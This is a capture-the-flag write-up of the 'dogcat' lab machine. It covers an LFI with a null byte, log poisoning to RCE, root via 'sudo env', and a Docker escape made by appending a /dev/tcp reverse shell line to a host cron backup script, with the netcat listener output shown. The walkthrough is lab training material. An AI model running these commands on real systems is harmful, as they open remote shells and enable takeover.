Enumeration
Started by checking what ports are open:
root@osboxes:~/Documents/dogcat# cat scan.txt
[*] OS based on TTL
Linux
[*] TCP Scan
Open ports: 22,80
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 24:31:19:2a:b1:97:1a:04:4e:2c:36:ac:84:0a:75:87 (RSA)
| 256 21:3d:46:18:93:aa:f9:e7:c9:b5:4c:0f:16:0b:71:e1 (ECDSA)
|_ 256 c1:fb:7d:73:2b:57:4a:8b:dc:d7:6f:49:bb:3b:d0:20 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: dogcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Execution time:
TTL: 0
Furious: 48
Nmap: 13
Total: 61
User
Then opened the website and saw a possible LFI attack vector:
Tried opening /etc/passwd
but “only dogs or cats are allowed”:
Then tried opening it including “cat” using a null-byte:
It seems that is using something similar to:
|
|
Used the php wrapper to show the content of index.php
in base64 encoding:
Decoded the string and got the source code:
We can use the parameter ext
to avoid “.php” being appended. Then made an Apache Log Poisoning attack to upgrade the LFI to RCE:
Encoded a reverse shell to “URL Encoding” and then executed with that RCE:
Root
Checked if there is sudo permissions as www-data
:
www-data@bc2d166cba99:/var/www/html$ sudo -l
Matching Defaults entries for www-data on bc2d166cba99:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on bc2d166cba99:
(root) NOPASSWD: /usr/bin/env
We can get a shell using /usr/bin/env
according to GTFOBins:
www-data@bc2d166cba99:/var/www/html$ sudo env /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
Docker
Used linpeas to enumerate how to get the 4th flag (since we are in a docker):
It seems that there is a cronjob on the real host that is creating backups using /opt/backups/backup.sh
:
root@d4871bd286e0:/opt/backups# ls -l
total 5884
-rwxr--r-- 1 root root 111 Aug 5 12:09 backup.sh
-rw-r--r-- 1 root root 6021120 Aug 5 13:31 backup.tar
root@d4871bd286e0:/opt/backups# cat backup.sh
cat backup.sh
#!/bin/bash
tar cf /root/container/backup/backup.tar /root/container
Appended a reverse shell at the end of the file:
root@d4871bd286e0:/opt/backups# echo "bash -i >& /dev/tcp/10.9.31.216/5555 0>&1" >> backup.sh
root@d4871bd286e0:/opt/backups# cat backup.sh
#!/bin/bash
tar cf /root/container/backup/backup.tar /root/container
bash -i >& /dev/tcp/10.9.31.216/5555 0>&1
And got the shell:
root@osboxes:~/Documents/dogcat# rlwrap nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.9.31.216] from (UNKNOWN) [10.10.32.79] 48636
bash: cannot set terminal process group (5306): Inappropriate ioctl for device
bash: no job control in this shell
root@dogcat:~# ls
container
flag4.txt
root@dogcat:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc fq_codel state UP group default qlen 1000
link/ether 02:5f:6d:d3:53:60 brd ff:ff:ff:ff:ff:ff
inet 10.10.32.79/16 brd 10.10.255.255 scope global dynamic eth0
valid_lft 2719sec preferred_lft 2719sec
inet6 fe80::5f:6dff:fed3:5360/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:58:bd:55:be brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:58ff:febd:55be/64 scope link
valid_lft forever preferred_lft forever
5: veth8e8f886@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether 2a:07:5a:c8:77:b0 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::2807:5aff:fec8:77b0/64 scope link
valid_lft forever preferred_lft forever